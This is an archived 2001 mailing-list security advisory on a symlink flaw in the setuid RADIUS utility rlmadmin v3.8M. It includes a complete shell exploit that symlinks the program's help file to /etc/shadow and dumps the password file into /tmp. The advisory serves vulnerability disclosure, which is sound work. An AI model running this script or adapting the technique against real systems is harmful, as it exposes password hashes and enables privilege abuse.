-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- [Ministry-Of-Peace] - Security Advisory #01 - 07th Sept 2001 rlmadmin v3.8M view file symlink vulnerability -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- Overview: --------- rlmadmin is a user management utility for RADIUS which comes with the Merit AAA Server package (http://www.merit.edu/michnet/dial-in/aaa/). Using this program and a simple symlink, you can view any file on the system as root. Description: ------------ Using the -d option of rlmadmin allows you to specify the directory in which it will look for its configuration files. The files that it looks for in this directory during startup are: dictionary - dictionary translations for parsing requests and generating responses. rlmadmin.help - the help file that is displayed on startup. vendors - vendor specific information. The problem occurs when rlmadmin reads from the "rlmadmin.help" file. If this file is symlinked to another file (such as /etc/shadow), the program blindly follows the link, causing the contents of the file to be displayed when the program starts up. Versions Affected: ------------------ rlmadmin v3.8M (and earlier?) rlmadmin v5.01 Commercial (available from www.interlinknetworks.com - this version isn't setuid root by default, but is still affected if set by the admin) Exploit Code: ------------- #!/bin/sh # -- -- -- -- -- -- -- -- -- -- -- -- -- -- # # rlmadmin view file symlink vulnerability # # (c)oded 2001 Digital Shadow # # www.ministryofpeace.co.uk # # -- -- -- -- -- -- -- -- -- -- -- -- -- -- # bloc=/usr/private/etc # executable file location cloc=/usr/private/etc/raddb # config file location file=/etc/shadow # file to read echo == rlmadmin exploit - visit \ www.ministryofpeace.co.uk for more! echo = Initialising... mkdir /tmp/peace; cd /tmp/peace cp $cloc/dictionary $cloc/vendors . ln -s $file rlmadmin.help echo = Exploiting... echo quit | $bloc/rlmadmin -d /tmp/peace > peace.log mv peace.log /tmp; rm dictionary rlmadmin.help vendors echo = Done! echo == Now look in /tmp/peace.log! Credits: -------- Vulnerability discovered by Digital Shadow. -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- advisories[at]ministryofpeace.co.uk -- www.ministryofpeace.co.uk -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- Sent through GMX FreeMail - http://www.gmx.net
This archive was generated by hypermail 2b30 : Fri Sep 07 2001 - 08:40:36 PDT